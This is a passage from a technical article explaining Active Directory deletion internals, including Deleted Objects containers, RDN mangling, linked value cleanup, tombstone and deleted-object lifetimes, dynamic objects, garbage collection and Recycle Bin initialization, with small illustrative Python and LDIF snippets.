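           else LDAP_SERVER_SHOW_DELETED_OID)
    return [(oid, True, None)]  # (OID, criticality, control value)
```

A real search would pass the returned list as the server controls of the LDAP search request.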
The deleted objects container(s) are referenced as well-known objects on each naming context (NC) head they belong to by the “wellKnownObjects” attribute. The reference is stored with the binary distinguished name (DN-Binary) syntax, where the DN portion must be the DN of the deleted objects container, e.g. “CN=Deleted Objects,CN=Configuration,DC=X”, and the binary portion must contain a well-known GUID (identifying that the DN represents a deleted objects container): “18E2EA80684F11D2B9AA00C04F79F805”. If no such entry is present in the “wellKnownObjects” attribute on the naming context (NC) head, the NC is considered not to have a deleted objects container.
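A minimal sketch of resolving the Deleted Objects container from a “wellKnownObjects” value. The parsing assumes the textual DN-Binary form “B:&lt;hex char count&gt;:&lt;hex&gt;:&lt;DN&gt;”; the GUID constant is the well-known GUID quoted above:

```python
# Well-known GUID identifying the Deleted Objects container (from the text).
GUID_DELETED_OBJECTS_CONTAINER = "18E2EA80684F11D2B9AA00C04F79F805"

def deleted_objects_dn(well_known_objects):
    """Return the DN paired with the Deleted Objects well-known GUID, or None
    when the NC is considered not to have a deleted objects container."""
    for value in well_known_objects:
        # DN-Binary textual form: B:<hex char count>:<hex>:<DN>
        prefix, _count, guid_hex, dn = value.split(":", 3)
        if prefix == "B" and guid_hex.upper() == GUID_DELETED_OBJECTS_CONTAINER:
            return dn
    return None
```

For example, `deleted_objects_dn(["B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,CN=Configuration,DC=X"])` returns the container DN.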
Logically deleted objects are moved into the “Deleted Objects” container except in the following cases:
There is no “Deleted Objects” container in the NC the object resides in
The object has the SystemFlags bit: FLAG_DISALLOW_MOVE_ON_DELETE
The object is a naming context (NC) head.
The object is being removed as a part of the removal of an entire read-only naming context (NC)
If the object can’t be moved into a deleted objects container for some reason, the object is deleted anyway (the attributes in Table 1: ‘Logical deletion sets the following attributes’ are still set) but without being moved. Additionally, objects that are immediately physically deleted (i.e. objects that never transit to the phases of tombstones, deleted objects or recycled objects, such as dynamic objects) are never moved into a deleted objects container.
The Deleted Objects (DO) containers implement the following semantics at the database level (NTDS.dit)
Note: ‘time_col’ is set to “9999-12-29 23:59:59” – pretty far from now, right? As mentioned above, the ‘Deleted Objects’ container(s) themselves have ‘isDeleted’ set to True, making them invisible to LDAP except when the LDAP_SERVER_SHOW_DELETED_OID control is passed – this raises another question: what prevents the ‘Deleted Objects’ container(s) from being garbage collected? Well, they are on the index and appear as deleted objects; it’s just that it won’t happen until “9999-12-29 23:59:59”.
I did a test and actually changed this to something (not that far) away in time:
Name mangling for deletion
When an object is logically deleted, its relative distinguished name (RDN) is eventually mangled for deletion – this enforces a unique relative distinguished name (RDN) when and if the object is moved into the deleted objects container (please see ‘The Deleted Objects (DO) containers’ above for constraints on when the object moves).
A relative distinguished name (RDN) is mangled for deletion as follows: <RDN>0x0ADEL:<GUID>. Note: the <RDN> might be truncated to ensure the whole new RDN isn’t larger than 255 characters. Sample: “CN=Christoffer Andersson\0ADEL:1e5f5da7-af10-4d69-9c06-491c79659116”
If the Recycle-Bin is enabled, the original relative distinguished name (RDN) is stored in msDS-LastKnownRDN before it’s mangled for deletion.
Logically deleted objects are relative distinguished name (RDN) mangled except in the following cases:
The object is a naming context (NC) head.
The object is being removed as a part of the removal of an entire read-only naming context (NC).
Objects that are immediately physically deleted (i.e. objects that never transit to the phases of tombstones, deleted objects or recycled objects, such as dynamic objects) – don’t have their names mangled for deletion either.
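The mangling rule above is simple enough to sketch as code. The delimiter is the byte 0x0A (a line feed, which is why tools render it escaped as “\0ADEL:”) followed by “DEL:” and the object’s GUID, with the original RDN value truncated so the result never exceeds 255 characters:

```python
import uuid

def mangle_rdn_for_deletion(rdn_value, object_guid):
    """Sketch of delete-mangling: <RDN>\\x0ADEL:<GUID>, truncating the
    original RDN so the mangled name is at most 255 characters."""
    suffix = "\x0aDEL:" + str(object_guid)  # 0x0A + "DEL:" + 36-char GUID
    keep = 255 - len(suffix)                # room left for the original RDN
    return rdn_value[:keep] + suffix
```

Running it on the sample above reproduces “Christoffer Andersson\0ADEL:1e5f5da7-af10-4d69-9c06-491c79659116”.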
The removal of linked attribute values
Prior to Windows Server 2003 and Linked Value Replication (LVR), linked values were removed instantly from the ‘link_table’ on each DSA.
Linked value replication (LVR) allows individual values of a multivalued attribute to be replicated separately. In Windows 2000 Server, when a change was made to a member of a group (one example of a multivalued attribute with linked values), the entire group had to be replicated including all linked values. With linked value replication (LVR), only the group member that has changed is replicated, not the entire group. Linked value replication (LVR) was introduced in Windows Server 2003 and requires all DSAs in the forest to run at least Windows Server 2003 and the forest functional level (FFL) to be Windows Server 2003 or later. Beyond those requirements, linked value replication requires replication metadata per value, in addition to replication metadata per attribute, to track changed values.
Starting with linked value replication (LVR), the state of a deleted (ABSENT) value has to be replicated and received by all DSAs within the tombstone lifetime (TSL), just like logically deleted objects. After a value has been deleted (marked as ABSENT), it will be garbage collected and physically removed once a tombstone lifetime (TSL) has elapsed since the date of the delete – Please see ‘Tombstones and tombstone lifetime’ and ‘The Garbage collector process’ below for more information.
The following events are logged if an ABSENT linked value is garbage collected (physically deleted from the database):
Table 5: ABSENT Linked Value being Garbage Collected
Event ID: 1697 – Source: ActiveDirectory_DomainService – Category: Garbage Collection
Description: Internal event: Active Directory Domain Services removed the following expired, deleted attribute value from the following object.
The ‘link_deltime’ column is the column that holds the time of when a linked value was made ABSENT and marked for deletion.
‘link_deltime’ is not accessible through any external interfaces (such as LDAP or ADSI) – However, the value’s property metadata should have a ‘Last Org.Time/Date’ that matches the value stored in the ‘link_deltime’ column.
Note: Only present in Windows Server 2003 databases and later
The ‘link_ncdnt’ column was added to support linked value replication (LVR) – as linked attribute values are replicated, there needs to be a way to determine the naming context (NC) they belong to (replication is always performed per naming context)
Note: Only present in Windows Server 2003 databases and later
Let’s have a look at the ‘link_table’ in NTDS.dit with link values representing the LEGACY, PRESENT and ABSENT states:
The link cleaner and the delayed link processing mechanism
The link cleaner (present in Windows Server 2003 and later) and delayed link processing (present in Windows Server 2008 R2 and later) are mechanisms that continue operations on links for objects that need, and have been marked for, “cleaning”. An object needs “cleaning” when more than a maximum number of its links have to change state: only the maximum limit of links change to the desired new state in the original transaction, and the remaining links are processed (in batches of the maximum limit, each in its own transaction) by either the link cleaner or the delayed link processing mechanism, which runs as a scheduled task.
The reason that only a maximum (limit) of links can change state in a single transaction is to avoid ESE version store limits (i.e. the number of changes that can be held in the ‘copy buffer’ and committed in a single transaction to the NTDS.dit database) – therefore the remaining links over the maximum limit have to be processed in separate transactions, hence the link cleaner and the delayed link processing mechanism.
The link cleaner was introduced in Windows Server 2003 – the issue became more critical with the capability of Linked Value Replication (LVR), which allows a linked attribute to store more than 5000 linked values.
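The batching idea above can be sketched in a few lines. This is not the actual DSA code, just an illustration of why everything past the per-transaction limit is pushed into follow-up transactions, which is exactly the job of the link cleaner / delayed link processing task:

```python
def process_links_in_batches(links, apply_batch, batch_size=1000):
    """apply_batch stands in for one committed ESE transaction over at most
    batch_size link rows; returns the number of transactions used."""
    transactions = 0
    for start in range(0, len(links), batch_size):
        apply_batch(links[start:start + batch_size])  # one transaction
        transactions += 1
    return transactions
```

With 2500 links and the Link Cleaner default of 1000, three transactions are needed: 1000, 1000 and 500 links.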
Table 7: Background processing of linked values
Link Cleaner
DSA versions: Windows Server 2003, Windows Server 2003 R2, Windows Server 2008
Maximum links in one transaction: 1000
Initialized: 30 minutes after boot
Re-scheduled: every 12 hours
Triggers: 60 seconds after an object has been marked for cleaning
Maximum run time: the task runs for a maximum of 5 minutes until it reschedules itself. If there is more work to do: immediately rescheduled. If triggered by cleaning: don’t reschedule. If the recurring task: reschedule within 12 hours. Note: the Link Cleaner takes the above action as well if it has processed more than 1000000 links.
Delayed Link Processing
DSA versions: Windows Server 2008 R2, Windows Server 2012
Maximum links in one transaction: 10000
Initialized: 30 minutes after boot
Re-scheduled: every 12 hours
Triggers: when an object has been marked for cleaning and the original transaction has been committed
Maximum run time: the task runs for a maximum of 5 minutes until it reschedules itself. If there is more work to do: immediately rescheduled. If triggered by cleaning: don’t reschedule. If the recurring task (i.e. not triggered by ‘doLinkCleanUp’): reschedule within 12 hours.
The following events will eventually trigger the link cleaner or the delayed link processing mechanism:
Table 8: Events that trigger background processing of linked values
Mechanism: Link Cleaner / Delayed Link Processing – Event: more than 1000/10000 links removed when an object is logically deleted – Recycle Bin state: Off – Action: links are physically removed
Mechanism: Link Cleaner / Delayed Link Processing – Event: more than 1000/10000 links removed when an object is physically deleted (Note: the object remains represented as a non-object, also known as a phantom, and the row in the database remains until all links have been deleted) – Recycle Bin state: N/A – Action: links are physically removed
Mechanism: Link Cleaner / Delayed Link Processing – Event: more than 1000/10000 links are touched, making the replicator replicate them out (as when a non-universal group changes into a universal group) – Recycle Bin state: N/A – Action: links replicate out to the GCs
Mechanism: Link Cleaner / Delayed Link Processing – Event: more than 1000/10000 links are removed as a result of a universal group being changed to a non-universal group – Recycle Bin state: N/A – Action: links disappear from the GCs
Mechanism: Delayed Link Processing – Event: more than 10000 links are removed when an object is logically deleted – Recycle Bin state: On – Action: links are deactivated
Mechanism: Delayed Link Processing – Event: an object with more than 10000 links transforms from being logically deleted into being recycled – Recycle Bin state: On – Action: links are physically removed
Mechanism: Delayed Link Processing – Event: an object with more than 10000 links is being undeleted – Recycle Bin state: On – Action: links are activated
In Windows Server 2008 R2 and later, the number of links that are processed in a single transaction can be configured by a registry parameter: “Links process batch size”.
The ‘Links process batch size’ DWORD registry value can be configured within the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<INSTANCE>\Parameters. Note: a value of 0 can’t be used – and I strongly recommend against changing the default behavior.
The Delayed Link Processing or Link Cleaner process can be initiated manually by triggering the operational attribute “doLinkCleanUp”: http://msdn.microsoft.com/en-us/library/cc223304(v=prot.10) on Windows Server 2003 DSAs or later.
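Triggering that operational attribute is done with an LDAP modify of the rootDSE. As a sketch, the modify can be expressed as LDIF (e.g. for ldifde.exe); note that MS-ADTS spells the rootDSE attribute “doLinkCleanup”, and the empty dn line targets the rootDSE:

```python
# LDIF for the rootDSE modify that triggers the link cleanup task.
DO_LINK_CLEANUP_LDIF = "\n".join([
    "dn:",                    # empty DN = rootDSE
    "changetype: modify",
    "add: doLinkCleanup",
    "doLinkCleanup: 1",
    "-",
])
```

Importing this LDIF against a DC (with sufficient rights) asks the DSA to start the cleanup pass.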
The link cleaner and the delayed link processing mechanism implement the following at the database level (NTDS.dit)
Table 9: datatable – Simplified for the link cleaner and the delayed link processing mechanism
Used by the delayed link processing mechanism to identify rows that need work performed.
Note: Only present in Windows Server 2008 R2 databases and later
The following Performance Monitors are available to track Delayed Link Processing:
Table 11: Delayed Link Processing Performance Counters
Category: NTDS – Name: Link Values Cleaned/sec – Operating System: Windows Server 2008 or later
Description: The rate at which link values that need to be cleaned are cleaned.
Tombstones and tombstone lifetime
The object remains in this state (referred to as a tombstone) for the period of the tombstone lifetime (TSL), which is by default either 60 or 180 days depending on the operating system and service pack level of the first domain controller introduced in the Active Directory forest:
Table 12: tombstoneLifetime (TSL) defaults
60 days – Windows 2000 Server (all versions), Windows Server 2003 RTM, Windows Server 2003 R2
180 days – Windows Server 2003 Service Pack 1 or later, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012
The defaults are more specifically defined in the [Directory Service] section of the schema.ini file that is used during the DCPROMO process; Table 13 gives you an extract of the schema.ini file:
Table 13: Schema.ini (TSL) defaults
Schema.ini
;——————————————————–
; Windows NT subtree under the Services subtree
;——————————————————–
[Windows NT]
objectClass=Container
ObjectCategory=Container
ShowInAdvancedViewOnly=True
CHILD=Directory Service
[Directory Service]
objectClass=nTDSService
ObjectCategory=NTDS-Service
ShowInAdvancedViewOnly=True
; Explict TSL default set in W2K3 SP1 to increase shelf-life of backups and allow longer
; disconnection times.
tombstoneLifetime=180
The tombstone lifetime (TSL) is defined in days by the “tombstoneLifetime” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object. However, if the attribute doesn’t contain a value (i.e. is NULL), the tombstone lifetime (TSL) is always 60 days, regardless of the defaults in Table 12.
If a value of less than 2 days is specified, the tombstone lifetime (TSL) defaults to 60 days, except on Windows Server 2008 R2 and Windows Server 2012, where it defaults to 2 days. Finally, the tombstone lifetime (TSL) can, as mentioned in Table 13 above, be defined in “schema.ini” before the first domain controller is promoted in the forest.
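The effective-TSL rules just described can be condensed into a small sketch (the function name and the OS flag are illustrative, not anything AD exposes):

```python
def effective_tombstone_lifetime(tombstone_lifetime_days,
                                 os_2008r2_or_later=False):
    """Sketch of the effective TSL rules: NULL -> 60 days; below 2 days ->
    60 days (2 days on Windows Server 2008 R2 / 2012); else the value."""
    if tombstone_lifetime_days is None:   # attribute has no value (NULL)
        return 60
    if tombstone_lifetime_days < 2:       # below-minimum values
        return 2 if os_2008r2_or_later else 60
    return tombstone_lifetime_days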
The tombstones remain for as long as the tombstone lifetime (TSL) and are then deleted from the database (this is referred to as physical deletion and happens locally on each DSA by the Garbage Collector); eventually the object (row) may remain represented as a phantom that exists in the database to satisfy reference integrity (i.e. other rows in the database that reference the row being deleted).
Deleted objects lifetime and deleted objects
The deleted objects lifetime, also known as the DOL, was introduced with Windows Server 2008 R2 to support the Recycle Bin feature, where it becomes possible to un-delete an already deleted object to its original state. The deleted objects lifetime (DOL) determines the timeframe in days (by default the same as the tombstone lifetime) for how long a deleted object is left in a deleted state so that it can be fully restored (un-deleted). Once the object has passed the DOL it’s transformed into a recycled object, which resembles a tombstone and is processed much like a tombstone. The deleted objects lifetime is defined in days by the “msDS-DeletedObjectLifetime” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object. However, if the attribute doesn’t contain a value (i.e. is NULL), the deleted objects lifetime is equal to the tombstone lifetime mentioned above. The deleted objects lifetime can never be shorter than 2 days.
The deleted objects remain for as long as the deleted objects lifetime (DOL) and are then transformed into recycled objects, where most information on the object is stripped away.
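The DOL fallback rules can be sketched the same way (function name illustrative): NULL falls back to the tombstone lifetime, and the result can never be shorter than 2 days:

```python
def effective_deleted_object_lifetime(dol_days, tsl_days):
    """Sketch of the DOL rules: NULL -> equal to the TSL,
    and never shorter than 2 days."""
    if dol_days is None:          # msDS-DeletedObjectLifetime has no value
        dol_days = tsl_days
    return max(dol_days, 2)       # the 2-day floor always applies
```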
Dynamic Objects
Dynamic objects were introduced with Windows Server 2003 (by introducing the ability to dynamically linking auxiliary classes to instantiated objects). More specifically the “dynamicObject” auxiliary class that can be added to an object during creation/instantiation of an object and/or added as an objectClass later on to an already existing/instantiated object.
Dynamic objects are objects that are automatically deleted after a period of time. When they are deleted (automatically or manually), they do not transform into any other state, such as a tombstone, deleted-object, or recycled-object (However they may transform into a non-object, also known as a phantom, to satisfy reference integrity). They are distinguished from regular objects by the presence of the dynamicObject auxiliary class among their objectClass values. The intended time of deletion is specified (in seconds) by the Entry-TTL attribute.
The following requirement applies to Dynamic Objects:
Must be hosted by a Windows Server 2003 DSA or later
Can only be instantiated in a domain naming context (Domain NC) if the forest functional level (FFL) is Windows Server 2003 or later. Note: this is because a down-level DSA (earlier than Windows Server 2003) wouldn’t know what dynamic objects are, and wouldn’t delete them. One might first think that a requirement of domain functional level (DFL) would have been more suitable; however, the object could still spread to down-level DSAs in other domains through Global Catalogs (GCs).
Can always be instantiated in non-domain naming contexts (NDNCs) – because NDNCs can’t by design ever be fully hosted by a down-level DSA (earlier than Windows Server 2003), nor are they Global Catalog (GC) replicated. (I’ve made several attempts to trick an NDNC into being GC replicated, without success.)
Can never be instantiated in/added to an object at:
The Schema naming context (NC)
The Configuration naming context (NC)
An object that has the FLAG_DISALLOW_DELETE bit present in its systemFlags attribute.
All descendant objects, if any, must be dynamic objects as well.
Must be physically deleted by the DSA when all of the following conditions are met:
The current time is greater than or equal to its msDS-Entry-Time-To-Die.
There are no descendant objects.
In theory there should never be any; descendant objects will have their msDS-Entry-Time-To-Die adjusted by the garbage collector so that they are removed before their parent.
There are no simple (non-linked) references to the object (no other object references the dynamic object)
If there are simple (non-linked) references to the object, the object (row) remains represented as a non-object, also known as a phantom.
The object is not a critical system object (i.e. NOT having Is-Critical-System-Object or is-Critical-Object set to True)
Entry-TTL requirements: The Entry-TTL attribute specifies (in seconds) the intended time-to-live (TTL) for the dynamic object (once the time has elapsed the object is processed for physical deletion by the DSA) and has the following requirements:
The minimum Entry-TTL that can be set for any dynamic object is the configurable ‘DynamicObjectMinTTL’ value, which is by default 900 seconds (15 minutes). The default can be changed by modifying the ‘DynamicObjectMinTTL=<seconds>’ value of the “msDS-Other-Settings” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object (the minimum value is 1 and the maximum value is 31557600, one year). If the ‘DynamicObjectMinTTL’ value isn’t present in the “msDS-Other-Settings” attribute, the default is 900 seconds (15 minutes).
The maximum Entry-TTL that can be set for any dynamic object is by default defined by the rangeUpper attribute of the Entry-TTL schema object. The default maximum value is 31557600 seconds (one year). Note: the rangeUpper attribute can’t be modified on a constructed attribute; it is possible to change this default value, but it’s not recommended and requires a lot of knowledge.
The Entry-TTL can be set during the instantiation/creation of a dynamic object as long as the value is between (1.) and (2.) above. However, if no Entry-TTL attribute is specified during the creation of a dynamic object, the DSA will set the configurable ‘DynamicObjectDefaultTTL’ value, which is by default 86400 seconds (one day). The default can be changed by modifying the ‘DynamicObjectDefaultTTL=<seconds>’ value of the “msDS-Other-Settings” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object (the minimum value is 1 and the maximum value is 31557600, one year).
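The three Entry-TTL rules can be condensed into one sketch. Whether an out-of-range request is rejected or clamped isn’t spelled out above; this sketch assumes it is rejected as a constraint violation:

```python
def effective_entry_ttl(requested_ttl=None,
                        dynamic_object_min_ttl=900,       # 15 minutes
                        dynamic_object_default_ttl=86400, # one day
                        max_ttl=31557600):                # one year (rangeUpper)
    """Sketch of the Entry-TTL rules: no value supplied -> the
    DynamicObjectDefaultTTL; otherwise the request must fall between
    DynamicObjectMinTTL and the schema maximum."""
    if requested_ttl is None:               # no entryTTL supplied at creation
        return dynamic_object_default_ttl
    if not dynamic_object_min_ttl <= requested_ttl <= max_ttl:
        raise ValueError("entryTTL outside the allowed range")
    return requested_ttl
```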
How Dynamic Objects are maintained by the DSA
Dynamic objects are maintained by the DSA (evaluated for deletion once their TTL expires) by two different tasks:
By its own scheduled task that is initiated and starts 15 minutes after startup – the task then processes dynamic objects in the following manner:
Process dynamic objects that match: current time >= msDS-Entry-Time-To-Die, until all dynamic objects in the range have been processed, or more than 5000 objects have been processed (ESE version store limit), or a shutdown has been initiated.
If an object couldn’t be deleted for any of the following reasons, skip to the next candidate:
The object is marked critical (i.e. isCriticalSystemObject is set to TRUE)
The object has backlinks pointing towards it and those can’t be removed.
The object still has descendant/child objects.
The object has simple references pointing towards it and was therefore converted into a non-object, also known as a phantom, instead.
When (a.) completes, the task finishes with one of the following statuses:
There were more than 5000 objects to process (more objects than can be modified in a single ESE DB transaction to the NTDS.dit with respect to the ESE version store). Action: the task is re-scheduled immediately.
If the last object evaluated in (a.) hadn’t reached its expiry time yet, and was about to expire in less than the configurable ‘Delete expired entryTTL (secs)’ value, which is by default 900 (15 minutes), then the task is re-scheduled within the configurable ‘Delete next expired entryTTL (secs)’ value, which is by default 30 (30 seconds), plus the seconds until that object expires.
The ‘Delete expired entryTTL (secs)’ and the ‘Delete next expired entryTTL (secs)’ DWORD registry values can be configured within the following key:
Note: if those registry values aren’t present, the defaults mentioned above apply; the value can’t be 0 (zero) and updated values don’t take effect until the next reboot.
If neither (i.) nor (ii.) occurred, the task is re-scheduled to run within the configurable ‘Delete expired entryTTL (secs)’ value, which is by default 900 (15 minutes), again.
By the garbage collector (Please see the next section: The Garbage collector process)
The Garbage collector process
The Garbage collector process runs by default every 12 hours, and 15 minutes after startup, independently on each DSA. The garbage collection interval is defined in hours by the “garbageCollPeriod” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object (minimum is one hour and maximum is one week). However, if the attribute doesn’t contain a value (i.e. is NULL), the garbage collection period is always the default 12 hours.
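As with the TSL and DOL, the effective interval can be sketched in a few lines. Treating out-of-range values as clamped to the 1–168 hour window is an assumption here; the text only states the minimum and maximum:

```python
def effective_garbage_collection_period(garbage_coll_period_hours):
    """Sketch of the interval rules: NULL -> 12 hours; otherwise assumed
    clamped between 1 hour and one week (168 hours)."""
    if garbage_coll_period_hours is None:   # garbageCollPeriod has no value
        return 12
    return min(max(garbage_coll_period_hours, 1), 168)
```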
The Garbage Collector is responsible for the following subtasks:
Manage logically deleted objects and phantoms:
Phantoms that are older than the TSL/DOL:
Physically delete: phantoms without reference counts that don’t appear on the ‘recycle_time_index’ (i.e. have a ‘time_col’ value that has passed the TSL/DOL).
Modify: phantoms that still have reference counts, have expired and don’t appear on the ‘recycle_time_index’ (i.e. had a ‘time_col’ value that had passed the TSL/DOL), setting their ‘time_col’ to the current date so that they won’t be looked at again for another TSL/DOL.
Deleted Objects that are older than the TSL/DOL:
Physically delete: all Deleted Objects if the schema doesn’t have the ‘isRecycled’ attribute. *Only happens on a Windows Server 2008 R2 DSA or later. Note: can happen in AD LDS
Physically delete: all Deleted Objects in non-writable naming contexts (NCs) if the recycle bin is in the off state
Recycle: Deleted Objects in writable naming contexts (NCs). *Only happens on a Windows Server 2008 R2 DSA or later when the schema has ‘isRecycled’
Physically delete: all boot-strap objects from the distribution database (NTDS.dit)
Recycled Objects that are older than the TSL:
Physically delete: all Recycled Objects regardless of naming context (NC) or state of the recycle bin.
Recycled phantoms that are older than the TSL:
Physically delete: all phantoms without reference counts that appear on the ‘recycle_time_index’ (i.e. have a ‘recycle_time_col’ value that has passed the TSL).
Modify: phantoms that still have reference counts, have expired and appear on the ‘recycle_time_index’ (i.e. had a ‘recycle_time_col’ value that had passed the TSL), setting their ‘recycle_time_col’ to the current date so that they won’t be looked at again for another TSL.
Deleted linked values that are older than the TSL:
Physically delete: all linked-value replication (LVR) values that are ABSENT and older than the TSL.
Dynamic objects that are older than their ‘msDS-Entry-Time-To-Die’:
Physically delete: all dynamic objects that have expired (older than their time to live). Note: for detailed processing, please see the section above: How Dynamic Objects are maintained by the DSA.
Note: on pre-Windows Server 2008 R2 DSAs, (a.) and (b.) above apply to the TSL rather than the DOL.
Note: pre-Windows Server 2008 R2 DSAs don’t process steps (c.) and (d.) above.
Note: pre-Windows Server 2003 DSAs don’t process steps (e.) and (f.) above.
The following is logged once the garbage collection process successfully removes a tombstone or recycled object (the object is most likely demoted to a phantom):
Table 15: Garbage Collection Removal Event
Event ID: 1132 – Source: ActiveDirectory_DomainService – Category: Garbage Collection
Description: Internal event: The Directory Service removed the expired, deleted object <Object> from the database.
Event ID: 2918 – Source: ActiveDirectory_DomainService – Category: Garbage Collection
Description: Internal event: The Directory Service recycled the expired, deleted object <Object> from the database.
Perform online defragmentation of the Active Directory database NTDS.dit – if and only if the DecoupleDefragFromGarbageCollection (0000000001) DSA Heuristics flag has not been set and the DSA didn’t process more than 5000 objects or values according to the table below: http://support.microsoft.com/kb/871003
The following event is logged once the online defragmentation has completed:
Table 16: Online Defragmentation Completed Event
Event ID: 1646 – Source: ActiveDirectory_DomainService – Category: Garbage Collection
Description: Internal event: The Active Directory Domain Services database has the following amount of free hard disk space remaining.
The Garbage Collection process is rescheduled more aggressively than the garbage collection period if more than 5000 objects/phantoms and/or values were examined:
Windows 2000 Server (all versions): there were more than 5000 expired tombstones in the pass – the task is rescheduled to 1/2 of the garbage collection period.
Windows Server 2003 (all versions) and Windows Server 2008 (all versions): there were more than 5000 expired tombstones, expired absent link values and expired dynamic objects (combined) in the pass – the task is rescheduled immediately.
Windows Server 2008 R2 and Windows Server 2012: there were more than 5000 expired deleted objects/phantoms, expired recycled objects/phantoms, expired absent link values and expired dynamic objects (combined) in the pass – the task is rescheduled immediately.
The following indices are implemented at the database layer to support the garbage collection tasks described above:
Table 18: datatable – Indices required to support the Garbage Collection Process
Used by the garbage collector to find expired deleted objects and phantoms that don’t have a ‘recycle_time_col’ value, and either evaluate them for physical deletion or recycle them.
Note: Only present in Windows Server 2008 R2 and later databases.
Used by the garbage collector to find expired ABSENT deleted link values and physically delete them.
Note: Only present in Windows Server 2003 databases or later.
The following Performance Monitors are available to track Garbage Collection activity:
Table 19: Garbage Collection Performance Counters
Category: NTDS – Name: Tombstones Visited/sec – Operating System: Windows Server 2008 or later
Description: The rate at which tombstoned objects are visited to be considered for garbage collection.
Category: NTDS – Name: Tombstones Garbage Collected/sec – Operating System: Windows Server 2008 or later
Description: The rate at which expired tombstoned objects are garbage collected.
The following event will be logged once the Garbage Collector task has completed:
Table 20: Garbage Collection Completed Event
Event ID: 1006 – Source: ActiveDirectory_DomainService – Category: Garbage Collection
Description: Internal event: Finished removing deleted objects that have expired (garbage collection). Number of expired deleted objects that have been removed: <Number of removed objects>.
Initialization of the Recycle-Bin in the off mode – Introduction of a Windows Server 2008 R2 DSA or later
So turning the Recycle-Bin off is impossible, right? Well, all writable Windows Server 2008 R2 and later DSAs actually do related work on every startup, but not in the way you’re thinking: they prepare for someone eventually turning the feature on in the future (this task can simply be referred to as a cleanup).
This is accomplished by scanning the ‘deltime_not_recycled_index’ for tombstones (excluding phantoms), i.e. logically deleted objects with ‘isDeleted’ set to 1 (True), in all writable naming contexts (NCs) present on each writable Windows Server 2008 R2 or later DSA (regardless of functional level), and recycling them – setting ‘isRecycled’ to 1 (True) and their ‘recycle_time_col’, so that they instead appear on the ‘recycletime_index’ and disappear from the ‘deltime_not_recycled_index’. There are however two conditions:
The ‘isRecycled’ attribute must be present in the schema
The Recycle-Bin must be off (however, it must have been off at some time; the exception here is a DSA being built from an Install From Media (IFM) database (NTDS.DIT))
This is required because the garbage collector in Windows Server 2008 R2 or later works with the ‘recycletime_index’ for physically deleting tombstones and recycled objects in writable naming contexts. This is an optimization: once the Recycle-Bin is enabled, there is no need for all DSAs to simultaneously try to convert all current tombstones into recycled objects.
The initialization process will process tombstones in batches of 5000 until it has finished processing all tombstones, re-scheduling itself between batches (like the regular garbage collection process, please see ‘The Garbage collector process’ above) and logging the following event every time it reschedules:
Table 21: Windows Server 2008 R2 DSA still processing initialization of the Recycle-Bin in the off-mode
Event ID: 2138 – Source: ActiveDirectory_DomainService – Category: Garbage Collection
Description: Internal processing of the Active Directory Domain Services database has not yet completely updated the Active Directory Domain Services’ tracking of the state of deleted objects. Until this processing completes successfully, objects may not be undeleted. Additionally, the Recycle Bin feature may not be enabled. This processing is continuing.
Once it has completed processing all tombstones the following event will be logged:
Table 22: Windows Server 2008 R2 DSA has completed processing initialization of the Recycle-Bin in the off-mode
Event ID: 2139 – Source: ActiveDirectory_DomainService – Category: Garbage Collection
Description: Internal processing of the Active Directory Domain Services database has completed the update of the Active Directory Domain Services’ tracking of the state of deleted objects.
This also comes with one disadvantage initially – Temporary Lingering Objects:
Recycling an object (in this case a tombstone), i.e. setting ‘isRecycled’ to 1 (True), is a replicating event – causing the change to replicate out to other DSAs that host or have hosted the object in the past. As it is a tombstone, it could already have been physically deleted on some DSAs, depending on if/when those DSAs were restarted and when the latest scheduled garbage collection took place. Where the object has already been physically deleted, an update is being replicated for a now nonexistent object on this DSA (the DRA/replicator on this DSA is going to treat this as an ‘Add’ of a new object, until it realizes it’s missing attributes required for an ‘add’ of a new object) – the DSA is going to indicate lingering objects by logging the following event:
Table 21: Lingering Object caused by introduction of a writable Windows Server 2008 R2 or later DSA
Event ID
Source
Category
Description
1388
ActiveDirectory_DomainService
Replication
Active Directory Domain Services Replication encountered the existence of objects in the following partition that have been deleted from the local domain controllers (DCs) Active Directory Domain Services database. Not all direct or transitive replication partners replicated in the deletion before the tombstone lifetime number of days passed. Objects that have been deleted and garbage collected from an Active Directory Domain Services partition but still exist in the writable partitions of other DCs in the same domain, or read-only partitions of global catalog servers in other domains in the forest are known as “lingering objects”.
This event is being logged because the source DC contains a lingering object which does not exist on the local DC's Active Directory Domain Services database. This replication attempt has been blocked.
The situation will resolve itself within one garbage collection interval (by default 12 hours), i.e. once all DSAs have garbage collected (physically deleted) the object from their databases. However, the issue can also be remediated by doing the following:
Increase the garbage collection interval prior to the introduction of the first writable Windows Server 2008 R2 DSA or later.
Once this initialization has been performed by a Windows Server 2008 R2 or later DSA for the first time in all writable naming contexts in your forest, it's unlikely that the Recycle-Bin off-mode initialization will find any tombstones to convert into recycled objects in the future (although this is checked on every startup), because from then on a logical deletion (while the Recycle-Bin is still off) will have both the 'isRecycled' and the 'isDeleted' attribute set by the writable Windows Server 2008 R2 and later DSAs.
Phantoms and reference integrity
So what is reference integrity in Active Directory? References in Active Directory are one object pointing to another object (or one row referencing another row in the database) by an attribute that has one of the following syntaxes:
Object(DS-DN)
Object(DN-String)
Object(DN-Binary)
Object(Access-Point)
Object(OR-Name)
The requirement that comes with references is that an object (row in the database) that has other objects (rows in the database) pointing towards it (referencing it) can't be physically removed until all references to it have been removed first.
Let’s create two objects, where one of the objects references the other object by the attribute ‘seeAlso’:
dn: cn=Christoffer Andersson,cn=ESEDEV,DC=ADAM,DC=chrisse,DC=com
changetype: add
objectClass: user

dn: cn=Jimmy Andersson,cn=ESEDEV,DC=ADAM,DC=chrisse,DC=com
changetype: add
objectClass: user
seeAlso: cn=Christoffer Andersson,cn=ESEDEV,DC=ADAM,DC=chrisse,DC=com
